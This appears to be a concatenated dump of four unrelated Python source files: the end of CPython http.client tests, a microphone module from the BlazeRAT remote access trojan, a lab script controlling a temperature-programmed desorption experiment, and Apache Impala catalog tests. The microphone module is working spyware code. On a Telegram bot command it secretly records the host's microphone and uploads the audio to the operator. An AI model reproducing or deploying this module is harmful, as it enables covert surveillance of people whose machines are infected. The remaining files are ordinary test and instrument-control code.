cert_file=CERT_localhost)
self.assertTrue(h._context.post_handshake_auth)
class RequestBodyTest(TestCase):
"""Test cases where a request includes a message body."""
def setUp(self):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket("")
self.conn.sock = self.sock
def get_headers_and_fp(self):
f = io.BytesIO(self.sock.data)
f.readline() # read the request line
message = client.parse_headers(f)
return message, f
def test_list_body(self):
# Note that no content-length is automatically calculated for
# an iterable. The request will fall back to send chunked
# transfer encoding.
cases = (
([b'foo', b'bar'], b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
((b'foo', b'bar'), b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
)
for body, expected in cases:
with self.subTest(body):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket('')
self.conn.request('PUT', '/url', body)
msg, f = self.get_headers_and_fp()
self.assertNotIn('Content-Type', msg)
self.assertNotIn('Content-Length', msg)
self.assertEqual(msg.get('Transfer-Encoding'), 'chunked')
self.assertEqual(expected, f.read())
def test_manual_content_length(self):
# Set an incorrect content-length so that we can verify that
# it will not be over-ridden by the library.
self.conn.request("PUT", "/url", "body",
{"Content-Length": "42"})
message, f = self.get_headers_and_fp()
self.assertEqual("42", message.get("content-length"))
self.assertEqual(4, len(f.read()))
def test_ascii_body(self):
self.conn.request("PUT", "/url", "body")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("4", message.get("content-length"))
self.assertEqual(b'body', f.read())
def test_latin1_body(self):
self.conn.request("PUT", "/url", "body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_bytes_body(self):
self.conn.request("PUT", "/url", b"body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_text_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "w") as f:
f.write("body")
with open(support.TESTFN) as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
# No content-length will be determined for files; the body
# will be sent using chunked transfer encoding instead.
self.assertIsNone(message.get("content-length"))
self.assertEqual("chunked", message.get("transfer-encoding"))
self.assertEqual(b'4\r\nbody\r\n0\r\n\r\n', f.read())
def test_binary_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "wb") as f:
f.write(b"body\xc1")
with open(support.TESTFN, "rb") as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("chunked", message.get("Transfer-Encoding"))
self.assertNotIn("Content-Length", message)
self.assertEqual(b'5\r\nbody\xc1\r\n0\r\n\r\n', f.read())
class HTTPResponseTest(TestCase):
def setUp(self):
body = "HTTP/1.1 200 Ok\r\nMy-Header: first-value\r\nMy-Header: \
second-value\r\n\r\nText"
sock = FakeSocket(body)
self.resp = client.HTTPResponse(sock)
self.resp.begin()
def test_getting_header(self):
header = self.resp.getheader('My-Header')
self.assertEqual(header, 'first-value, second-value')
header = self.resp.getheader('My-Header', 'some default')
self.assertEqual(header, 'first-value, second-value')
def test_getting_nonexistent_header_with_string_default(self):
header = self.resp.getheader('No-Such-Header', 'default-value')
self.assertEqual(header, 'default-value')
def test_getting_nonexistent_header_with_iterable_default(self):
header = self.resp.getheader('No-Such-Header', ['default', 'values'])
self.assertEqual(header, 'default, values')
header = self.resp.getheader('No-Such-Header', ('default', 'values'))
self.assertEqual(header, 'default, values')
def test_getting_nonexistent_header_without_default(self):
header = self.resp.getheader('No-Such-Header')
self.assertEqual(header, None)
def test_getting_header_defaultint(self):
header = self.resp.getheader('No-Such-Header',default=42)
self.assertEqual(header, 42)
class TunnelTests(TestCase):
def setUp(self):
response_text = (
'HTTP/1.0 200 OK\r\n\r\n' # Reply to CONNECT
'HTTP/1.1 200 OK\r\n' # Reply to HEAD
'Content-Length: 42\r\n\r\n'
)
self.host = 'proxy.com'
self.conn = client.HTTPConnection(self.host)
self.conn._create_connection = self._create_connection(response_text)
def tearDown(self):
self.conn.close()
def _create_connection(self, response_text):
def create_connection(address, timeout=None, source_address=None):
return FakeSocket(response_text, host=address[0], port=address[1])
return create_connection
def test_set_tunnel_host_port_headers(self):
tunnel_host = 'destination.com'
tunnel_port = 8888
tunnel_headers = {'User-Agent': 'Mozilla/5.0 (compatible, MSIE 11)'}
self.conn.set_tunnel(tunnel_host, port=tunnel_port,
headers=tunnel_headers)
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertEqual(self.conn._tunnel_host, tunnel_host)
self.assertEqual(self.conn._tunnel_port, tunnel_port)
self.assertEqual(self.conn._tunnel_headers, tunnel_headers)
def test_disallow_set_tunnel_after_connect(self):
# Once connected, we shouldn't be able to tunnel anymore
self.conn.connect()
self.assertRaises(RuntimeError, self.conn.set_tunnel,
'destination.com')
def test_connect_with_tunnel(self):
self.conn.set_tunnel('destination.com')
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
# issue22095
self.assertNotIn(b'Host: destination.com:None', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
# This test should be removed when CONNECT gets the HTTP/1.1 blessing
self.assertNotIn(b'Host: proxy.com', self.conn.sock.data)
def test_connect_put_request(self):
self.conn.set_tunnel('destination.com')
self.conn.request('PUT', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
def test_tunnel_debuglog(self):
expected_header = 'X-Dummy: 1'
response_text = 'HTTP/1.0 200 OK\r\n{}\r\n\r\n'.format(expected_header)
self.conn.set_debuglevel(1)
self.conn._create_connection = self._create_connection(response_text)
self.conn.set_tunnel('destination.com')
with support.captured_stdout() as output:
self.conn.request('PUT', '/', '')
lines = output.getvalue().splitlines()
self.assertIn('header: {}'.format(expected_header), lines)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
microphone.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Import modules
from io import BytesIO
from core.logger import Log
from threading import Thread
from wave import open as wave_open # pip3 install wave
from pyaudio import paInt16, PyAudio # pip3 install pyaudio
from core.messages import services as Messages
"""
Author : LimerBoy
github.com/LimerBoy/BlazeRAT
Notes :
The file is needed
to record audio from a microphone
"""
# Settings
FORMAT = paInt16
CHUNK = 1024
CHANNELS = 2
RATE = 44100
# Global variables
global r, p, t, stream, frames
r, p, t, stream, frames = False, None, None, None, []
""" Record voice from microphone """
def _RecordMicrophone():
# Initialize
global r, p, stream, frames
frames = []
r = True
p = PyAudio()
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
# Record microphone
while r:
data = stream.read(CHUNK)
frames.append(data)
stream.stop_stream()
stream.close()
p.terminate()
""" Asynchronously record voice from microphone """
def _StartAsync():
global r, t
if r: return False
try:
t = Thread(target=_RecordMicrophone)
t.start()
except Exception as error:
print(error)
r = False
else:
return True
""" Stop recording """
def _Stop() -> bytes:
global r, p, t, stream, frames
if not r: return False
r = False
t.join()
# Write to memory
obj = BytesIO()
wf = wave_open(obj, "wb")
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(b''.join(frames))
wf.close()
return obj.getvalue()
""" Handle telegram command """
def Handle(callback: dict, bot) -> None:
text = callback.data
chatid = callback.from_user.id
# Start microphone recording
if "Enable" in text:
# Start voice recording
voice = _StartAsync()
if voice != False:
Log(f"Microphone >> Start voice recording", chatid)
bot.send_message(chatid, Messages.microphone_recording_started)
bot.send_chat_action(chatid, "record_audio")
# Send error message if recording already started
else:
bot.send_message(chatid, Messages.microphone_recording_not_stopped)
# Stop microphone recording
elif "Disable" in text:
# Send recorded voice message
voice = _Stop()
if voice != False:
Log(f"Microphone >> Stop voice recording", chatid)
bot.send_chat_action(chatid, "upload_audio")
bot.send_voice(
chat_id=chatid, voice=voice,
reply_to_message_id=callback.message.message_id,
caption=Messages.microphone_recording_stopped
)
# Send error message if recording not started
else:
bot.send_message(chatid, Messages.microphone_recording_not_started)
|
Main_Tweak_Test-copy.py
|
import Call_UTI
from send_multiple_setpoints import *
from read_Temp_value import *
import numpy as np
import pandas as pd
import os
import sys
from threading import Thread
from ctypes import *
import time
from pyqtgraph.Qt import QtCore, QtGui
import pyqtgraph as pg
import numpy as np
import math
from thermocouples_reference import thermocouples
import itertools
# from initial_UTI import *
"""
1. start reading the masses cycle through 1-2 times (check)
2. take the average time to cycle = total time to write setpoints (check)
3. start the 'official' program
4. read temperature, and masses and write while reading the masses
a. assume that the time to read the temperature = 0
do read mass 2 times:
get the cycle time
for asdfa:
do read mass and write sp(cycle time) use threads
thread1.join()
thread2.join()
do read value
"""
########################################################################################################################
def thread_send_mV_setpoint(iter_freq_, mv_setpoints_, sendFreq, alpha, child_thread):
# alpha_iter = 0
while child_thread.isAlive():
# start_alpha = time.time()
# currentTime = time.time()
# Write new setpoint for temperature
# adjust send freq
time.sleep(alpha*sendFreq)
try:
if iter_freq_ < len(mv_setpoints_):
controlObj.write_sp(mv_setpoints_[iter_freq_])
# TODO might insert the sleep here
iter_freq_ += 1
else:
controlObj.write_sp(mv_setpoints_[0])
except (IndexError, OSError) as e:
print(e)
# probably wrote past the last mv setpoint, so just go back to first setpoint....
# this is also a safety in case theres a brief communication error
try:
time.sleep(0.01)
controlObj.close_me()
controlObj.open_me()
if iter_freq_ < len(mv_setpoints_):
controlObj.write_sp(mv_setpoints_[iter_freq_])
iter_freq_ += 1
else:
controlObj.write_sp(mv_setpoints_[0])
except (ValueError, OSError) as e:
print(e)
try:
time.sleep(0.01)
controlObj.close_me()
controlObj.open_me()
if iter_freq_ < len(mv_setpoints_):
controlObj.write_sp(mv_setpoints_[iter_freq_])
iter_freq_ += 1
else:
controlObj.write_sp(mv_setpoints_[0])
finally:
controlObj.close_me()
controlObj.open_me()
controlObj.write_sp(mv_setpoints_[0])
print('give up')
except (ValueError, OSError) as e:
print(e)
try:
time.sleep(0.01)
controlObj.close_me()
controlObj.open_me()
if iter_freq_ < len(mv_setpoints_):
controlObj.write_sp(mv_setpoints_[iter_freq_])
iter_freq_ += 1
else:
controlObj.write_sp(mv_setpoints_[0])
except (ValueError, OSError) as e:
print(e)
try:
time.sleep(0.01)
controlObj.close_me()
controlObj.open_me()
if iter_freq_ < len(mv_setpoints_):
controlObj.write_sp(mv_setpoints_[iter_freq_])
iter_freq_ += 1
else:
controlObj.write_sp(mv_setpoints_[0])
finally:
controlObj.close_me()
controlObj.open_me()
controlObj.write_sp(mv_setpoints_[0])
print('give up')
# if alpha_iter%int(2/sendFreq) == 0:
# # do stuff, adjust alpha
# end_alpha = time.time() - start_alpha
# alpha = alpha * (end_T - start_T) / (end_alpha * heatingRate)
#
#
# alpha_iter+=1
# for controlling the frequency that data is sent
# if time.time()-start_time < data_freq:
# time.sleep(data_freq - (time.time()-start_time))
# if iter_freq_ == len(mv_setpoints_)-1:
# return iter_freq_, mv_setpoints_[-1]
# else:
# return iter_freq_, mv_setpoints_[iter_freq_]
return iter_freq_
def thread_read_masses(list_of_masses_, list_of_sensitivities_, mass_signals_):
for mass, sens in zip(list_of_masses_, list_of_sensitivities_):
mass_signals_['mass{0}'.format(mass)] = np.append(mass_signals_['mass{0}'.format(mass)],
uti1.read_mass(mass, sens))
# mass_plot.setData(x=T_array, y=mass_signals['mass{0}'.format(mass)], pen='g')
return mass_signals_
def emergency_stop():
# stop increasing the temp and send a safe setpoint
controlObj.write_sp(0.0)
time.sleep(10)
quit()
class UTI_QMS():
def __init__(self,path, dll='scan_single_mass.dll'):
self.path = path
self.dll = dll
os.chdir(self.path)
self.LabVIEWQMS = cdll.LoadLibrary(self.dll)
self.LabVIEWQMS.Read_Mass_Spec.argtype = [c_int32, c_double]
self.LabVIEWQMS.Read_Mass_Spec.restype = c_double
def read_mass(self, _mass_, sensitivity):
_signal_ = self.LabVIEWQMS.Read_Mass_Spec(c_int32(sensitivity), c_double(_mass_))
# return [signal, mass, sensitivity]
return _signal_
########################################################################################################################
rootdir = 'C:\\Users\\Administrator\\Desktop\\PythonProjects\\LabViewtest'
dlldir = 'C:\\Users\\Administrator\\Desktop\\builds\\scanmass_single\\scan_single_mass'
""" Create UTI instance """
uti1 = UTI_QMS(path=dlldir)
""" Create Eurotherm instances """
"Create obj for reading and writing temperature to Eurotherm"
port1 = 'COM4'
controlObj = Eurotherm(port1)
"Create obj for reading Room temperature from Eurotherm"
port2 = 'COM5'
controlObj2 = Eurotherm(port2)
"For reading in Room Temp to correct Temp reading"
typeC = thermocouples['C']
########################################################################################################################
""" User-Defined Parameters: """
os.chdir(rootdir)
project_folder = 'project_name'
os.makedirs(project_folder, exist_ok=True)
experiment_name ='name1.csv'
# TODO vary masses and see how that affects response
number_of_masses = 8
list_of_masses = [4.0, 12.2, 28.1, 32.4,4.1, 12.3, 28.12, 32.5]
list_of_sensitivities = [4, 4, 4, 4,4, 4, 4, 4]
heating_rate = 7 # K/s
os.chdir(rootdir)
with open('interp_mV_to_Temp_func.pickle', 'rb') as f:
mV_T_table = pickle.load(f)
start_temp = np.round(read_temp(
controlObj.read_val(), typeC.emf_mVC(controlObj2.read_rt()), mV_T_table), 2)
end_temp = 700
assert len(list_of_masses) == number_of_masses, 'lengths do not match up'
assert len(list_of_sensitivities) == number_of_masses, 'lengths do not match up'
assert len(list_of_masses) == len(set(list_of_masses)), 'you have duplicate masses being monitored'
########################################################################################################################
""" Check time to loop through masses: """
no_of_loops = 5
single_read_times = []
set_read_times = []
for i in range(no_of_loops):
start_set = time.time()
for j in range(number_of_masses):
start_single = time.time()
signal = uti1.read_mass(list_of_masses[j], list_of_sensitivities[j])
end_single = time.time() - start_single
single_read_times.append(end_single)
end_set = time.time() - start_set
set_read_times.append(end_set)
mean_single = np.mean(single_read_times)
""" This should be the time taken each loop to write setpoints """
mean_set = np.mean(set_read_times)
print("Average single read time is: {0}".format(np.round(mean_single, 4)))
print("Average set read time is: {0}".format(np.round(mean_set, 4)))
# Initial UTI looping
# mean_single, mean_set = loop__time(number_of_masses, list_of_masses, list_of_sensitivities)
""" Determine setpoint increment """
# multiple = 2 # how many times per second to change the setpoint
# temp_set_incr = heating_rate * mean_set/multiple # setpoint increment assuming each loop takes "mean_set" seconds
sendFreq = 0.1
alpha = 1
# rate_adjust = 1.9
# temp_set_incr = heating_rate * data_freq * rate_adjust # setpoint increment assuming each loop takes "mean_set" seconds
temp_set_incr = heating_rate * sendFreq*2 # setpoint increment assuming each loop takes "mean_set" seconds
# temp_set_incr = heating_rate * sendFreq*1.75 # setpoint increment assuming each loop takes "mean_set" seconds
temp_setpoints = np.arange(start_temp, end_temp+1, temp_set_incr)
# making the list of setpoint values to be sent at each loop iteration
os.chdir(rootdir)
with open('interp_Temp_to_mV_func.pickle','rb') as interpdvalues:
interpd = pickle.load(interpdvalues)
# These are the mV that will be sent to the Eurotherm
mv_setpoints = interpd(temp_setpoints - controlObj2.read_rt())
""" Set up multiple plot windows for TPD """
app = pg.QtGui.QApplication([])
win1 = pg.GraphicsWindow(title="QMS Signal Plots")
win1.resize(710, 970/4*math.ceil(number_of_masses/2))
win2 = pg.GraphicsWindow(title="Temperature Plot")
win2.resize(420, 400)
proxy = QtGui.QGraphicsProxyWidget()
button = QtGui.QPushButton('STOP')
proxy.setWidget(button)
Tplot = win2.addPlot(title="Temperature (K)", labels={'bottom': 'Time(s)', 'left': 'Temperature (K)'})
Tplot.addLegend()
Tplot.showGrid(x=True, y=True, alpha=1)
stop_button = win2.addItem(proxy)
button.clicked.connect(emergency_stop)
plots = []
for j in range(int(math.ceil(number_of_masses/2))):
plots.append([win1.addPlot(title="m/e = {0}".format(list_of_masses[2*j+i]), labels={'bottom': 'Temperature(K)',
'left': 'Signal (a.u.)'})
for i in range(2) if 2*j+i < number_of_masses])
win1.nextRow()
plots = list(itertools.chain.from_iterable(plots))
curves = [plots[k].plot() for k in range(number_of_masses)]
T_read_curve = Tplot.plot(name='readout')
T_set_curve = Tplot.plot(name='setpoint')
pg.QtGui.QApplication.processEvents()
""" Main script loops for TPD """
"""
Basic structure of measurement loop:
for asdfa:
do read mass and write sp(cycle time) use threads
thread1.join()
thread2.join()
do read value
"""
T_array = np.array([])
time_array = np.array([])
# Make mass spec signals a dictionary of np.arrays so we can append to and manipulate each individually
# initialize dictionary of empty arrays
mass_signals = {}
for i in list_of_masses:
mass_signals["mass{0}".format(i)] = np.array([])
"""
This will need to be threaded, below
"""
# num_freq = 1
iter_freq = 0
temp_plot_arr = np.array([])
# this needs to be the max temperature or allowed to cut short if needed, also allow for the threading
# TODO increase frequency that setpoints are sent, maybe this fixes the tracking issue at higher temperatures.
# for i in range(50):
print('len of setpoints is: '+str(len(mv_setpoints)))
# for i, v, in enumerate(mv_setpoints):
# # for i in range(len(temp_setpoints)):
# # line below may be useful at times for debugging
# currentTime = time.time()
# # append current time to the array.
# time_array = np.append(time_array, time.time())
# # Read time and temperature data
# cum_time = np.cumsum(np.concatenate(([0], np.diff(time_array))))
# T_array = np.append(T_array, read_Temp_value())
# T_read_curve.setData(x=cum_time, y=T_array, pen='b', name='readout')
# # Write new setpoint for temperature
# try:
# # controlObj.write_sp(mv_setpoints[iter_freq])
# if iter_freq <= len(temp_setpoints) and iter_freq != 0:
# # temp_plot_arr = np.append(temp_plot_arr, temp_setpoints[multiple*i])
# temp_plot_arr = np.append(temp_plot_arr, temp_setpoints[i])
# else:
# temp_plot_arr = np.append(temp_plot_arr, temp_setpoints[0])
# except IndexError as e:
# print(e)
# controlObj.write_sp(mv_setpoints[0])
# # T_set_curve.setData(x=cum_time,y=temp_setpoints[:2*i+1:2], pen='r',name='setpoint')
# # T_set_curve.setData(x=cum_time, y=temp_plot_arr[:2*len(cum_time):2], pen='r', name='setpoint')
# T_set_curve.setData(x=cum_time, y=temp_plot_arr, pen='r', name='setpoint')
#
# # for j in range(number_of_masses):
#
# for mass, sens, mass_plot in zip(list_of_masses, list_of_sensitivities, curves):
# # np.append(mass_signals["mass{0}".format(list_of_masses[j])], uti1.read_mass(list_of_masses[j],list_of_sensitivities[j]))
# mass_signals['mass{0}'.format(mass)] = np.append(mass_signals['mass{0}'.format(mass)], uti1.read_mass(mass, sens))
# mass_plot.setData(x=T_array, y=mass_signals['mass{0}'.format(mass)], pen='g')
# # if num_freq%2 == 0:
# try:
# if iter_freq < len(mv_setpoints):
# controlObj.write_sp(mv_setpoints[iter_freq])
# iter_freq+=1
# else:
# controlObj.write_sp(mv_setpoints[0])
#
# except (IndexError, OSError) as e:
# print(e)
# # probably wrote past the last mv setpoint, so just go back to first setpoint....
# # this is also a safety in case theres a brief communication error
# try:
# time.sleep(0.01)
# controlObj.close_me()
# controlObj.open_me()
# if iter_freq < len(mv_setpoints):
# controlObj.write_sp(mv_setpoints[iter_freq])
# iter_freq += 1
# else:
# controlObj.write_sp(mv_setpoints[0])
# except (ValueError, OSError) as e:
# print(e)
# try:
# time.sleep(0.01)
# controlObj.close_me()
# controlObj.open_me()
# if iter_freq < len(mv_setpoints):
# controlObj.write_sp(mv_setpoints[iter_freq])
# iter_freq += 1
# else:
# controlObj.write_sp(mv_setpoints[0])
# finally:
# controlObj.close_me()
# controlObj.open_me()
# controlObj.write_sp(mv_setpoints[0])
# print('give up')
# except (ValueError, OSError) as e:
# print(e)
# try:
# time.sleep(0.01)
# controlObj.close_me()
# controlObj.open_me()
# if iter_freq < len(mv_setpoints):
# controlObj.write_sp(mv_setpoints[iter_freq])
# else:
# controlObj.write_sp(mv_setpoints[0])
# except (ValueError, OSError) as e:
# print(e)
# try:
# time.sleep(0.01)
# controlObj.close_me()
# controlObj.open_me()
# if iter_freq < len(mv_setpoints):
# controlObj.write_sp(mv_setpoints[iter_freq])
# else:
# controlObj.write_sp(mv_setpoints[0])
# finally:
# controlObj.close_me()
# controlObj.open_me()
# controlObj.write_sp(mv_setpoints[0])
# print('give up')
#
# num_freq+=1
# # update the plots after going through all the masses
alpha_iter = 1
while iter_freq < len(mv_setpoints):
# append current time to the array.
time_array = np.append(time_array, time.time())
# Read time and temperature data
cum_time = np.cumsum(np.concatenate(([0], np.diff(time_array))))
t = Thread(target=thread_read_masses, args=(list_of_masses, list_of_sensitivities, mass_signals))
t.start()
start_alpha = time.time()
iter_freq = thread_send_mV_setpoint(iter_freq, mv_setpoints, sendFreq,alpha, t)
# Write new setpoint for temperature
try:
# controlObj.write_sp(mv_setpoints[iter_freq])
if iter_freq <= len(temp_setpoints) and iter_freq != 0:
# temp_plot_arr = np.append(temp_plot_arr, temp_setpoints[multiple*i])
temp_plot_arr = np.append(temp_plot_arr, temp_setpoints[iter_freq])
else:
temp_plot_arr = np.append(temp_plot_arr, temp_setpoints[0])
except IndexError as e:
print(e)
controlObj.write_sp(mv_setpoints[0])
# T_set_curve.setData(x=cum_time,y=temp_setpoints[:2*i+1:2], pen='r',name='setpoint')
# T_set_curve.setData(x=cum_time, y=temp_plot_arr[:2*len(cum_time):2], pen='r', name='setpoint')
try:
T_set_curve.setData(x=cum_time[:len(temp_plot_arr)], y=temp_plot_arr, pen='r', name='setpoint')
except:
T_set_curve.setData(x=cum_time, y=temp_plot_arr[:len(cum_time)], pen='r', name='setpoint')
T_array = np.append(T_array, read_Temp_value())
T_read_curve.setData(x=cum_time, y=T_array, pen='b', name='readout')
# if alpha_iter % int(2 / sendFreq) == 0:
if alpha_iter % 2 == 0:
# do stuff, adjust alpha
end_alpha = time.time() - start_alpha
eval_alpha = alpha * (T_array[-1] - T_array[-2]) / (end_alpha * heating_rate)
if eval_alpha > 0.7:
alpha = eval_alpha
print('alpha: ' + str(alpha))
alpha_iter += 1
for mass, mass_plot in zip(list_of_masses, curves):
mass_plot.setData(x=T_array, y=mass_signals['mass{0}'.format(mass)], pen='g')
# T_set_curve.setData(x=cum_time,y=temp_plot_arr[:len(cum_time)], pen='r',name='setpoint')
pg.QtGui.QApplication.processEvents()
# uncomment if you want to see some cooldown
if iter_freq == len(mv_setpoints):
break
# include changing setpoints in stuff above
# at the very end, go back to initial mV setpoint
controlObj.write_sp(mv_setpoints[0] - interpd(controlObj2.read_rt()+273.15))
"""
read current value and add to plot, also include setpoint curve here too
"""
# T_array = np.append(T_array, read_Temp_value())
# T_read_curve.setData(x=cum_time, y=T_array)
pg.QtGui.QApplication.processEvents()
controlObj.close_me()
controlObj2.close_me()
os.chdir(project_folder)
time_Temp_arr = np.vstack((cum_time, T_array))
combined_data = pd.concat([pd.DataFrame(time_Temp_arr).T, pd.DataFrame.from_dict(mass_signals)], axis=1)
combined_data.rename(columns={0:'Time(s)', 1:'Temp(K)'}, inplace=True)
# save experiment
combined_data.to_csv(experiment_name, index=False, sep='\t')
print('hi')
if __name__ == '__main__':
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
app.exec_() # Start QApplication event loop ***
|
test_local_catalog.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Test behaviors specific to --use_local_catalog being enabled.
import pytest
import Queue
import random
import re
import threading
import time
from multiprocessing.pool import ThreadPool
from tests.common.custom_cluster_test_suite import CustomClusterTestSuite
from tests.common.skip import (SkipIfHive2, SkipIfS3, SkipIfABFS,
SkipIfADLS, SkipIfIsilon, SkipIfLocal)
from tests.util.filesystem_utils import WAREHOUSE
RETRY_PROFILE_MSG = 'Retried query planning due to inconsistent metadata'
CATALOG_VERSION_LOWER_BOUND = 'catalog.catalog-object-version-lower-bound'
class TestCompactCatalogUpdates(CustomClusterTestSuite):
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--use_local_catalog=true",
catalogd_args="--catalog_topic_mode=minimal")
def test_minimal_topic_updates_sync_ddl(self, unique_database):
"""
Start Impala cluster with minimal catalog update topics and local catalog enabled.
Run some smoke tests for SYNC_DDL to ensure that invalidations are propagated.
"""
self._do_test_sync_ddl(unique_database)
def _make_per_impalad_args(local_catalog_enabled):
assert isinstance(local_catalog_enabled, list)
args = ['--use_local_catalog=%s' % str(e).lower()
for e in local_catalog_enabled]
return "--per_impalad_args=" + ";".join(args)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
start_args=_make_per_impalad_args([True, False]),
catalogd_args="--catalog_topic_mode=mixed")
def test_mixed_topic_updates_sync_ddl(self, unique_database):
"""
Same as above, but with 'mixed' mode catalog and different configs
on the two different impalads used by the test.
"""
self._do_test_sync_ddl(unique_database)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
start_args=_make_per_impalad_args([False, True]),
catalogd_args="--catalog_topic_mode=mixed")
def test_mixed_topic_updates_sync_ddl_2(self, unique_database):
"""
Same as above, but with opposite configurations for the two
impalads used in the test.
"""
self._do_test_sync_ddl(unique_database)
def _do_test_sync_ddl(self, unique_database):
""" Implementation details for above two tests. """
try:
impalad1 = self.cluster.impalads[0]
impalad2 = self.cluster.impalads[1]
client1 = impalad1.service.create_beeswax_client()
client2 = impalad2.service.create_beeswax_client()
view = "%s.my_view" % unique_database
# Try to describe the view before it exists - should get an error.
# This should prime any caches in impalad2.
err = self.execute_query_expect_failure(client2, "describe %s" % view)
assert 'Could not resolve' in str(err)
# Create it with SYNC_DDL from client 1.
query_options = {"sync_ddl": 1}
self.execute_query_expect_success(client1, "create view %s as select 1" % view,
query_options)
# It should be immediately visible from client 2.
self.execute_query_expect_success(client2, "describe %s" % view)
# Test global INVALIDATE METADATA
new_db = unique_database + '_new'
self.execute_query_expect_success(
client1, "create database if not exists %s" % new_db, query_options)
# The new database should be immediately visible from client 2.
self.execute_query_expect_success(client2, "describe database %s" % new_db)
# Drop database in Hive. Params: name, deleteData, cascade
self.hive_client.drop_database(new_db, True, True)
self.execute_query_expect_success(client1, "invalidate metadata", query_options)
err = self.execute_query_expect_failure(client2, "describe database %s" % new_db)
assert 'Database does not exist' in str(err)
finally:
client1.close()
client2.close()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--use_local_catalog=true",
catalogd_args="--catalog_topic_mode=minimal")
def test_restart_catalogd(self, unique_database):
"""
Tests for the behavior of LocalCatalog when catalogd restarts.
"""
try:
impalad = self.cluster.impalads[0]
client = impalad.service.create_beeswax_client()
view = "%s.my_view" % unique_database
self.execute_query_expect_success(client, "create view %s as select 1" % view)
self.execute_query_expect_success(client, "select * from %s" % view)
# Should not have any detected restarts, initially.
self.assert_impalad_log_contains('WARNING', 'Detected catalog service restart',
expected_count=0)
# Kill catalogd, and while it's down, drop the view via HMS.
self.cluster.catalogd.kill()
# Drop the view via hive to ensure that when catalogd restarts,
# the impalads see the dropped view.
self.hive_client.drop_table(unique_database, "my_view", True)
# Start catalogd again. We should see the view disappear once the
# catalog pushes a new topic update.
self.cluster.catalogd.start()
NUM_ATTEMPTS = 30
for attempt in xrange(NUM_ATTEMPTS):
try:
self.assert_impalad_log_contains('WARNING', 'Detected catalog service restart')
err = self.execute_query_expect_failure(client, "select * from %s" % view)
assert "Could not resolve table reference" in str(err)
break
except Exception, e:
assert attempt < NUM_ATTEMPTS - 1, str(e)
time.sleep(1)
finally:
client.close()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--use_local_catalog=true",
catalogd_args="--catalog_topic_mode=minimal")
def test_invalidate_stale_partitions(self, unique_database):
"""
Test that partition level invalidations are sent from catalogd and processed
correctly in coordinators.
TODO: Currently, there are no ways to get the cached partition ids in a LocalCatalog
coordinator. So this test infers them based on the query pattern. However, this
depends on the implementation details of catalogd which will evolve and may have to
change the partition ids in this test. A more robust ways is a) get the cached
partition id of a partition, b) run a DML on this partition, c) verify the old
partition id is invalidate.
"""
# Creates a partitioned table and inits 3 partitions on it. They are the first 3
# partitions loaded in catalogd. So their partition ids are 0,1,2.
self.execute_query("use " + unique_database)
self.execute_query("create table my_part (id int) partitioned by (p int)")
self.execute_query("alter table my_part add partition (p=0)")
self.execute_query("alter table my_part add partition (p=1)")
self.execute_query("alter table my_part add partition (p=2)")
# Trigger a query on all partitions so they are loaded in local catalog cache.
self.execute_query("select count(*) from my_part")
# Update all partitions. We should receive invalidations for partition id=0,1,2.
self.execute_query("insert into my_part partition(p) values (0,0),(1,1),(2,2)")
log_regex = "Invalidated objects in cache: \[partition %s.my_part:p=\d \(id=%%d\)\]"\
% unique_database
self.assert_impalad_log_contains('INFO', log_regex % 0)
self.assert_impalad_log_contains('INFO', log_regex % 1)
self.assert_impalad_log_contains('INFO', log_regex % 2)
